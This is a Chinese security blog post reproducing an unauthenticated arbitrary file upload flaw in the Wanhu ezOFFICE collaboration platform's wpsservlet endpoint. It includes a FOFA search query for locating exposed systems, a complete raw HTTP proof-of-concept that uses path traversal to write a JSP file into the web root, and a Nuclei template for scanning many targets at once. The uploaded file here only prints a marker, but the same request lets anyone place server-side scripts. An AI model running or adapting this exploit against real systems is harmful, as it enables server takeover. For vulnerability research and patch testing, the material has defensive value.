漏洞复现--万户ezoffice wpsservlet任意文件上传

最新推荐文章于 2024-09-28 12:29:36 发布
最新推荐文章于 2024-09-28 12:29:36 发布
阅读量1.2k 收藏 7
点赞数 8
分类专栏: 漏洞复现 文章标签: 网络安全 web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_53003652/article/details/134805732
版权
本文报告了万户ezOFFICE协同管理平台的一个高危漏洞,wpsservlet存在任意文件上传,攻击者可利用该漏洞上传恶意脚本获取服务器权限。已提供POC和批量检测方法,用户需注意安全防范。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

免责声明:

文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任,一旦造成后果请自行负责

一:漏洞描述

万户ezOFFICE协同管理平台是一个综合信息基础应用平台。此系统wpsservlet存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。

二:漏洞影响版本

万户ezoffice

三:网络空间测绘查询

fofa:
app="万户网络-ezOFFICE"
image.png

四:漏洞复现

image.png
POC:

POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=check&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb
Content-Length: 200

--55aeb894de1521afe560c924fad7c6fb
Content-Disposition: form-data; name="NewFile"; filename="check.jsp"

<% out.print("This website has a vulnerability!!!");%>
--55aeb894de1521afe560c924fad7c6fb--

image.png
访问/defaultroot/platform/portal/layout/check.jsp
image.png

五:批量检测

id: wanhu-ezoffice-wpsservlet-upload

info:
  name: wanhu-ezoffice-wpsservlet-upload
  author: 芝士土拨鼠
  severity: high
  description: 万户ezOFFICE协同管理平台是一个综合信息基础应用平台。此系统wpsservlet存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限。

requests:
  - raw:
      - |-
        POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=check&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
        Accept-Encoding: gzip, deflate
        DNT: 1
        Connection: close
        Upgrade-Insecure-Requests: 1
        Content-Type: multipart/form-data; boundary=55aeb894de1521afe560c924fad7c6fb
        Content-Length: 200

        --55aeb894de1521afe560c924fad7c6fb
        Content-Disposition: form-data; name="NewFile"; filename="check.jsp"

        <% out.print("This website has a vulnerability!!!");%>
        --55aeb894de1521afe560c924fad7c6fb--

      - |
        GET /defaultroot/platform/portal/layout/check.jsp HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
        Accept-Encoding: gzip
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'vulnerability'
      - type: status
        status:
          - 200

image.png

万户ezOFFICE wpsservlet任意文件上传漏洞复现
0xSec
11-30 1509
万户ezOFFICE协同管理平台wpsservlet接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。 ​
万户 OA OfficeServer.jsp 任意文件上传漏洞复现
0xSec
12-16 1614
万户OA OfficeServer.jsp接口存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件从而控制整个服务器。
万户协同办公平台ezoffice wpsservlet接口任意文件上传漏洞
故事讲予风听
12-07 638
万户ezOFFICE协同管理平台是一个综合信息基础应用平台,平台ezoffice wpsservlet接口存在任意文件上传漏洞
万户OA upload任意文件上传漏洞复现
0xSec
11-20 1544
万户ezOFFICE协同管理平台upload接口处存在任意文件上传漏洞,未经身份认证的攻击者可以通过此漏洞上传恶意后门文件,造成代码执行或服务器失陷。
万户 ezOFFICE 文件上传漏洞复现
0xSec
12-10 1316
万户 ezOFFICE 协同管理平台 senddocument_import.jsp、OfficeServer.jsp等接口处存在鉴权绕过并且可以上传任意文件,攻击者可上传恶意木马获取服务器权限。
漏洞复现万户OA-wpsservlet-任意文件上传
知黑而守白
01-19 280
万户OA ezoffice万户网络协同办公产品多年来一直将主要精力致力于中高端市场的一款OA协同办公软件产品,统一的基础管理平台,实现用户数据统一管理、权限统一分配、身份统一认证。统一规划门户网站群和协同办公平台,将外网信息维护、客户服务、互动交流和日常工作紧密结合起来,有效提高工作效率。万户OA wpsservlet 接口存在文件上传漏洞。未经身份认证的攻击者通过该漏洞上传恶意文件,可能导致恶意代码执行、身份伪造、后门植入、敏感数据泄露等问题。
漏洞复现万户协同办公平台ezoffice wpsservlet接口存在任意文件上传漏洞 附POC
失心少年
12-05 1080
技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。本文所提供的工具仅用于学习,禁止用于其他!拼接上传地址:http://127.0.0.1/defaultroot/platform/portal/layout/40067.jsp。漏洞链接:http://127.0.0.1/defaultroot/platform/portal/layout/45441.jsp。
漏洞复现-万户ezOFFICE系列
aming小老弟
03-12 2200
万户OA[+]万户协同办公平台 ezoffice存在未授权访问漏洞wanhu_office|app=“万户ezOFFICE协同管理平台”万户ezEIP。
万户OA-ezOFFICE fileUpload.controller 任意文件上传漏洞复现
最新发布
iSee857的博客
09-28 898
万户OA-ezOFFICE fileUpload.controller中存在一个 任意文件上传漏洞,通过这个漏洞可以操纵任意文件的写入。这意味着不法分子可以利用这个漏洞上传任意可执行性文件用于远程系统执行、数据获取、系统接管等,严重威胁系统的安全性。万户ezOFFICE存在任意文件上传漏洞。攻击者可以通过该远程下载任意文件到目标服务器,导致攻击者可获取服务器控制权限。Fofa:app="万户ezOFFICE协同管理平台" || app="万户网络-ezOFFICE"上传成功后拼接下列接口进行访问。
万户OA-wpsservlet-任意文件上传
weixin_43567873的博客
03-04 204
万户OA-wpsservlet-任意文件上传漏洞
Goby 漏洞更新 | 万户 OA OfficeServer.jsp 任意文件上传漏洞
m0_46699477的博客
04-27 1922
ezOFFICE OA是面向政府机关、企事业单位的FlexOffice独立安全协同办公平台。 ezOFFICE OA OfficeServer jsp存在任意文件上传漏洞,攻击者可通过该漏洞上传任意文件控制整个服务器。
万户ezoffice wpsservlet任意文件上传漏洞
weixin_62352348的博客
01-29 417
万户ezOFFICE协同管理平台是一个综合信息基础应用平台分为企业版和政务版。万户ezOFFICE协同管理平台wpsservlet接口存在任意文件上传。攻击者可上传恶意脚本文件获取服务器权限
如何讲清楚async和await?_,ajaxa,azqa,(1),2024年最新细节决定成败
2401_83974020的博客
04-20 1003
当我学到一定基础,有自己的理解能力的时候,会去阅读一些前辈整理的书籍或者手写的笔记资料,这些笔记详细记载了他们对一些技术点的理解,这些理解是比较独到,可以学到不一样的思路。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。观看零基础学习视频,看视频学习是最快捷也是最有效果的方式,跟着视频中老师的思路,从基础到深入,还是很容易入门的。//那么这里就是在等待ajaxA请求的完成。//wait这个单词是等待的意思。
用友OA漏洞复现手册
LiBai'S BLOG
06-09 6297
https://blog.youkuaiyun.com/qq_41617034/article/details/124268004
万户oa漏洞复现
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
10-25 2403
万户oa漏洞复现万户oa漏洞详情 /defaultroot/officeserverservlet 路径存在文件上传漏洞 万户oa漏洞复现 POST /defaultroot/officeserverservlet HTTP/1.1 Host: XXXXXXXXX:7001 Content-Length: 782 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://XXXXXXXX7001 User-Agent
oracle sql注入绕过,万户OA某处绕过限制文件上传以及sql注入(无需登陆,通杀专业版标准版)...
weixin_36057482的博客
04-05 2641
sql注入:WooYun: 万户OA某处无限制sql注入里面的方法适用于标准版,专业版存在同样的文件但是路径不一样。defaultroot\iWebRevision.jsp\DocumentEdit.jspif (ObjConnBean.OpenConnection()) {System.out.println("OpenConnection");String Sql="Select * From...
文件上传漏洞-upload_labs
黑白的博客
12-13 1993
声明 学习文件上传漏洞 第一关 源码分析 可以看到allow_ext是黑名单,只允许jpg,png和gif进行,在前端进行校验,通过将文件名,截取文件名点.后面的后缀和这个黑名单进行比较 function checkFile() { var file = document.getElementsByName('upload_file')[0].value; if (file == null || file == "") { alert("请选择要上传的文件!");
Jsp挖掘(7)-JSP上传漏洞
thelostworld
05-11 3756
JSP上传漏洞 一、上传漏洞成因文件上传过程中,通常因为未校验上传文件后缀类型,导致用户可上传jsp等一些webshell文件。代码审计时可重点关注对上传文件类型是否有足够安全的校验,以及是否限制文件大小等。解决的方法:主要是限制文件的后缀名的校验,还有限制文件的大小文件上传漏洞的攻击与防御方式https://www.jianshu.com/p/5ebba04829801.前端限制(文件类型的验证)主要是前端的文件名的检查这个一般很好的绕过1.burp suite 绕过,抓包后面再修改文件的类型的后缀名2.
万户 ezoffice 文件上传漏洞复现
12-17
万户ezoffice是一个办公软件,用于处理各种办公文档。文件上传漏洞是指系统存在一个安全漏洞,允许攻击者在上传文件时注入恶意代码或者上传非法文件到服务器中。这个问题的产生可能是开发过程中没有充分考虑安全性,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

芝士土包鼠

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值